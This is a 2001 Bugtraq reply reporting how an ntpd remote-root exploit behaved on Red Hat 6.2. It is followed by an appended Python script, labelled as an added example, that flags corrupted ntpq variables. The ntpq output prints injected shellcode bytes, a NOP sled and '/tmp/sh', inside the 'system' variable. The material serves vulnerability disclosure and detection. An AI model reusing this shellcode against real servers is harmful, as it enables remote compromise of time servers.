[20101] in bugtraq

Re: ntpd =< 4.0.99k remote buffer overflow

daemon@ATHENA.MIT.EDU (Viraj Alankar)
Mon Apr 9 05:49:06 2001

MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Message-ID:  <Pine.GSO.4.31.0104071107020.18358-100000@home.ifxcorp.com>
Date:         Sat, 7 Apr 2001 11:18:13 -0400
Reply-To: Viraj Alankar <valankar@IFXCORP.COM>
From: Viraj Alankar <valankar@IFXCORP.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To:  <20010404222701.X91913@riget.scene.pl>

On Wed, 4 Apr 2001, Przemyslaw Frasunek wrote:

> /* ntpd remote root exploit / babcia padlina ltd. <venglin@freebsd.lublin.pl> */

Attempting this on a Redhat 6.2 system with xntp3-5.93 did not seem to
execute /tmp/sh or crash immediately but it did cause some corruption in
xntpd as can be seen below.

/usr/sbin/ntpq localhost
ntpq> rl
status=06f4 leap_none, sync_ntp, 15 events, event_peer/strat_chg
system="M-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-k^_^M-^Iv^H1M-@M-^HF^GM-^IF^LM-0^KM-^IM-sM-^MN^HM-^MV^LM-MM-^@1M-[M-^IM-X@M-MM-^@M-hM-\M-^?M-^?M-^?/tmp/shM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PwM-wM-^?M-?wM-wM-^?M-?M-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^P,
leap=00, stratum=4, rootdelay=78.70, rootdispersion=98.05, peer=12340,
refid=my.ntp.server,
reftime=be79abbf.f4677000  Sat, Apr  7 2001 11:07:43.954, poll=6,
clock=be79abfe.47251000  Sat, Apr  7 2001 11:08:46.277, phase=0.317,
freq=41029.82, error=0.12
ntpq>

Viraj.
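
A check an operator could run over saved `ntpq` `rl` output to spot the kind of corrupted variable shown in the message above. This is an added example, not part of the original post. It assumes the `M-`/`^` notation follows the `cat -v` convention; the function names are hypothetical and the sample input is constructed.

```python
import re
from itertools import groupby

# Printable notation as it appears in the output above; assumed to follow the
# cat -v convention (^X = control character, M- = high bit set).
TOKEN = re.compile(r"M-\^(.)|M-(.)|\^(.)|(.)", re.S)
# name=value pairs; a quoted value may contain commas.
VAR = re.compile(r'(\w+)=("[^"]*"|[^,\n]*)')

def decode_visible(text):
    """Turn the printable notation back into the byte values it stands for."""
    out = bytearray()
    for meta_ctl, meta, ctl, plain in TOKEN.findall(text):
        if meta_ctl:
            out.append(0x80 | (0x7F if meta_ctl == "?" else ord(meta_ctl) & 0x1F))
        elif meta:
            out.append(0x80 | (ord(meta) & 0x7F))
        elif ctl:
            out.append(0x7F if ctl == "?" else ord(ctl) & 0x1F)
        else:
            out.append(ord(plain) & 0xFF)
    return bytes(out)

def suspicious_variables(readlist):
    """Return the variables whose values hold bytes outside printable ASCII."""
    findings = {}
    for name, value in VAR.findall(readlist):
        raw = decode_visible(value.strip('"'))
        runs = [(len(list(g)), b) for b, g in groupby(raw) if not 0x20 <= b <= 0x7E]
        if runs:
            findings[name] = {
                "length": len(raw),
                "nonprintable": sum(n for n, _ in runs),
                "longest_run": max(runs),  # (run length, byte value)
            }
    return findings

# Constructed sample (not captured from a real daemon): a "system" value
# padded with 0x90 bytes, surrounded by ordinary variables.
SAMPLE = (
    'status=06f4 leap_none, sync_ntp, 15 events, event_peer/strat_chg\n'
    'system="' + "M-^P" * 8 + "AAAA" + "M-^P" * 4 + '",\n'
    'leap=00, stratum=4, rootdelay=78.70, refid=ntp.example.net,\n'
    'poll=6, freq=41029.82, error=0.12\n'
)

if __name__ == "__main__":
    for name, info in suspicious_variables(SAMPLE).items():
        print(name, info)
```

A healthy daemon should report only printable text in its system variables, so any finding is worth investigating.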
